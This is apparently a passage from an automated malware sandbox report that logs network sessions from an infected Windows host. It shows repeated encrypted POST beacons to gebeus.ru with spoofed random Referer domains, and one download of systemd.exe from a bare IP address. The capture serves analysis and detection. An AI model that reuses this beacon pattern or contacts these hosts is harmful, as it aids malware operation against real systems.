                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vu?3x0\R[q#j^c=eVVvN.<.6oLSc3|:Vj2l
                              Jul 6, 2024 06:16:40.991138935 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:16:40 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.44974658.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:40.999104023 CEST280OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://fdlrafionfniv.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 331
                              Host: gebeus.ru
                              Jul 6, 2024 06:16:40.999115944 CEST331OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 3a 31 d3 aa
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vu:1*luEFPok)X)hU5_#O!@q,f)MXd1,7&`aLcsds#^gmGC!
                              Jul 6, 2024 06:16:42.518129110 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:16:42 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.44974858.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:42.553994894 CEST282OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://gccqwiqvbuvikqp.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 193
                              Host: gebeus.ru
                              Jul 6, 2024 06:16:42.554013968 CEST193OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 4d 5e e4 a5
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vuM^]4}a]j43>r$1P+R*$=% %My^?Jm<L[{BQeN
                              Jul 6, 2024 06:16:44.031780958 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:16:43 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.44975158.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:44.040023088 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://cmklqbpjgqk.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 129
                              Host: gebeus.ru
                              Jul 6, 2024 06:16:44.040074110 CEST129OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 73 46 b0 ab
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vusFGWf]m?f'!$^Z,z
                              Jul 6, 2024 06:16:46.362783909 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:16:46 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.44975358.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:46.370857000 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://mckdxvknpnq.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 181
                              Host: gebeus.ru
                              Jul 6, 2024 06:16:46.370883942 CEST181OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 32 09 e8 85
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vu2v7r}pmgEg(kTpp@_ZoL:%kQ;vE&_6a
                              Jul 6, 2024 06:16:48.667340040 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:16:48 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.44975558.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:48.679307938 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://yuynggabmew.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 160
                              Host: gebeus.ru
                              Jul 6, 2024 06:16:48.679320097 CEST160OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 3b 02 af e4
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vu;`A^W2<[Y5y@!VIV)j* YE
                              Jul 6, 2024 06:16:50.180057049 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:16:49 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.44975758.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:50.188051939 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://xqvppjhqsfe.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 110
                              Host: gebeus.ru
                              Jul 6, 2024 06:16:50.188070059 CEST110OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 77 4a f3 9e
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vuwJn#DiI!`i=
                              Jul 6, 2024 06:16:51.710278034 CEST189INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:16:51 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb
                              Data Ascii: #\.\$iDm7&W


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.44975977.221.157.163802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:51.728033066 CEST163OUTGET /systemd.exe HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: 77.221.157.163


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.44976058.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:17:03.184636116 CEST283OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://ploihvdtbwudndea.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 123
                              Host: gebeus.ru
                              Jul 6, 2024 06:17:03.184665918 CEST123OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 7f 38 ce a8
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vu8j^bh{s.857wTU[f
                              Jul 6, 2024 06:17:05.017034054 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:17:04 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.44976158.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:17:05.027611971 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://buuohrwrsnx.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 265
                              Host: gebeus.ru
                              Jul 6, 2024 06:17:05.027631044 CEST265OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 5a 4e a4 ba
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vuZNzZH+|LD){$L6ekID!-Ka`>(|PS~QQfg^2W3ggh72Z7%B-
                              Jul 6, 2024 06:17:07.422121048 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:17:07 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.44976258.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:17:07.434891939 CEST281OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://gdehhwddskytmp.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 224
                              Host: gebeus.ru
                              Jul 6, 2024 06:17:07.434915066 CEST224OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 57 0d ca f0
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vuWe7WyJcH5r/v!(Q5D(ILIs91E_R*xrD_N&+DGs-l
                              Jul 6, 2024 06:17:08.996798992 CEST339INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:17:08 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
